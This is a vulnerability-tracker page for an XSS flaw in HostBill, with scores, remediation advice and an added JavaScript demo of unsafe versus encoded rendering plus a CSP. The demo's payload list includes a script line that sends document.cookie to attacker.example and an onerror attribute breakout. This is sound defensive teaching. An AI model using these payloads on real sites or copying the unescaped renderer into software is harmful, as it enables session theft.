Description
Cross Site Scripting vulnerability in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code
Published: 2026-04-24
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution
Action: Immediate Patch
AI Analysis

Impact

HostBill releases 2025‑11‑24 and 2025‑12‑01 contain a cross‑site scripting flaw (CWE‑79) that, in the words of the CVE description, allows a remote attacker to execute arbitrary code. In an XSS bug the code that executes is attacker‑supplied script running in a victim's browser under the HostBill origin: untrusted input reaches a page without context‑appropriate output encoding, and whoever loads that page runs the payload. The public record does not name the affected page or parameter, and does not say whether the injection is reflected or stored. The CVSS vector on this page (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N) rates the impact as high on confidentiality and none on integrity or availability, which fits browser‑side script that can read the victim's session, tokens and whatever the victim can see, rather than code execution on the HostBill server; read the phrase "arbitrary code" in that light unless the vendor publishes details showing otherwise. A hijacked administrator session still exposes everything that account can view in HostBill.

Affected Systems

The affected systems are HostBill installations running the 2025‑11‑24 or 2025‑12‑01 release. The CVE record does not identify the vulnerable page, parameter or interface, so until the vendor publishes details, any HostBill user (staff or client) who views pages that render data entered by other users should be considered exposed. Check the installed release date against the two affected builds to decide whether an instance is in scope.

Risk and Exploitability

The CVSS 3.1 score of 4.9 (Medium) comes from the vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N: the flaw is reachable over the network with low attack complexity, but PR:H means the attacker needs a highly privileged HostBill account to reach the injection point, and the rated impact is high on confidentiality only. The EPSS score below 1% indicates a low estimated probability of exploitation in the wild, and the CVE is not in the CISA KEV catalog. Note, however, that the SSVC entry recorded on this page sets Exploitation to 'poc', meaning a proof of concept exists, with Automatable 'no' and Technical Impact 'partial'. The realistic attack is an attacker who already holds a privileged account planting a script payload where other users will see it, then using the victim's browser to read session data and anything the victim can view. Integrity and availability are rated unaffected by the vector, so claims of server‑side code execution are not supported by the published metrics.

Generated by OpenCVE AI on April 28, 2026 at 07:10 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to a HostBill release newer than 2025‑12‑01 once the vendor publishes one that addresses this CVE. Both 2025‑11‑24 and 2025‑12‑01 are affected, so neither is a fix, and no fix is listed here at the time of writing.
  • Until a fix ships, reduce the pool of high‑privilege accounts (the vector's PR:H) that can reach the injection point, and review the user‑visible content those accounts have entered.
  • As defence in depth, deploy a Content Security Policy whose script-src omits 'unsafe-inline' so an injected inline script is refused, and mark session cookies HttpOnly and SameSite. These limit the damage but do not replace the actual fix, which is context‑appropriate output encoding of every untrusted value the application renders.
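
The injection pattern described under Impact and the output‑encoding and CSP items above, as an added example that is not HostBill's code and does not reproduce the actual CVE‑2026‑31050 input: the search handler, its template, the payloads and the nonce value are all constructed for illustration. It renders a request parameter both unencoded and encoded, uses a small attribute‑aware tokenizer to show which of the two outputs a browser would execute, and builds a CSP header that denies inline script.

```javascript
// Added illustration of a reflected XSS sink and its fix. Not HostBill code;
// the route, template, payloads and nonce below are constructed for this example.

// Encode untrusted data for an HTML text or quoted-attribute context.
// Other contexts (unquoted attributes, JavaScript, URLs, CSS) need their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable handler: the request parameter lands in markup unencoded, both
// in element text and inside an attribute value.
function renderSearchUnsafe(query) {
  return `<h1>Results for ${query}</h1>\n<input name="q" value="${query}">`;
}

// Hardened handler: same template, but the untrusted value is encoded for the
// contexts it is written into (text node and double-quoted attribute).
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  return `<h1>Results for ${q}</h1>\n<input name="q" value="${q}">`;
}

// Small HTML tokenizer (not a full parser). It records tag names and attribute
// names while honouring quoted attribute values, so the text "onerror=" inside
// an encoded value is not mistaken for a real attribute.
function tokenize(html) {
  const tags = [];
  const attrs = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i += 1; continue; }
    let j = i + 1;
    if (html[j] === '/') j += 1;
    let name = '';
    while (j < html.length && /[A-Za-z0-9]/.test(html[j])) name += html[j++];
    if (!name) { i += 1; continue; }            // a "<" that does not open a tag
    tags.push(name.toLowerCase());
    while (j < html.length && html[j] !== '>') {
      if (/\s/.test(html[j])) { j += 1; continue; }
      let attr = '';
      while (j < html.length && /[^\s=>/]/.test(html[j])) attr += html[j++];
      if (attr) attrs.push(attr.toLowerCase());
      while (j < html.length && /\s/.test(html[j])) j += 1;
      if (html[j] === '=') {
        j += 1;
        while (j < html.length && /\s/.test(html[j])) j += 1;
        const quote = html[j];
        if (quote === '"' || quote === "'") {
          j += 1;
          while (j < html.length && html[j] !== quote) j += 1;
          j += 1;                                // step over the closing quote
        } else {
          while (j < html.length && !/[\s>]/.test(html[j])) j += 1;
        }
      } else if (html[j] === '/') {
        j += 1;                                  // stray "/" as in "<br/>"
      }
    }
    i = j + 1;                                   // past the ">"
  }
  return { tags, attrs };
}

// Would a browser execute something in this page? Checks script elements and
// on* event-handler attributes; javascript: URLs and other vectors are out of
// scope for this illustration.
function hasExecutableMarkup(html) {
  const { tags, attrs } = tokenize(html);
  return tags.includes('script') || attrs.some((a) => a.startsWith('on'));
}

// Defence in depth: a CSP that refuses inline script and event handlers, so
// only the application's own scripts carrying the per-response nonce run.
// The nonce must be fresh and unguessable per response; here it is a parameter.
function cspHeader(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'none'",
  ].join('; ');
}

// Constructed payloads: a session-stealing script, an attribute breakout, and
// a benign term showing the safe renderer does not mangle ordinary input.
const payloads = [
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '"><img src=x onerror=alert(1)>',
  'plain search term',
];

// Run every payload through both renderers and report what executes.
function assess() {
  return payloads.map((p) => ({
    payload: p,
    unsafeExecutes: hasExecutableMarkup(renderSearchUnsafe(p)),
    safeExecutes: hasExecutableMarkup(renderSearchSafe(p)),
  }));
}

for (const r of assess()) console.log(r);
console.log('Content-Security-Policy:', cspHeader('r4nd0m'));
```

Running it shows the two hostile payloads producing a `<script>` element or an `onerror` attribute only in the unsafe output; the encoded output carries the same characters as inert text. The CSP is a second line of defence for the case where an encoding gap remains somewhere else in the application, not a substitute for closing that gap.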

Generated by OpenCVE AI on April 28, 2026 at 07:10 UTC.

Tracking


Advisories

No advisories yet.

History

Tue, 28 Apr 2026 07:30:00 +0000

Type | Values Removed | Values Added
Title | | Cross‑Site Scripting in HostBill Enables Remote Code Execution

Mon, 27 Apr 2026 19:30:00 +0000

Type | Values Removed | Values Added
First Time appeared | | Hostbillapp; Hostbillapp hostbill
Vendors & Products | | Hostbillapp; Hostbillapp hostbill

Fri, 24 Apr 2026 16:15:00 +0000

Type | Values Removed | Values Added
Weaknesses | | CWE-79
Metrics | | cvssV3_1 {'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}
Metrics | | ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 24 Apr 2026 15:00:00 +0000


Subscriptions

Hostbillapp Hostbill
MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-04-24T15:22:54.550Z

Reserved: 2026-03-09T00:00:00.000Z

Link: CVE-2026-31050

Vulnrichment

Updated: 2026-04-24T15:10:13.756Z

NVD

Status : Deferred

Published: 2026-04-24T15:16:26.980

Modified: 2026-04-24T17:55:55.317

Link: CVE-2026-31050

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-28T07:15:19Z

Weaknesses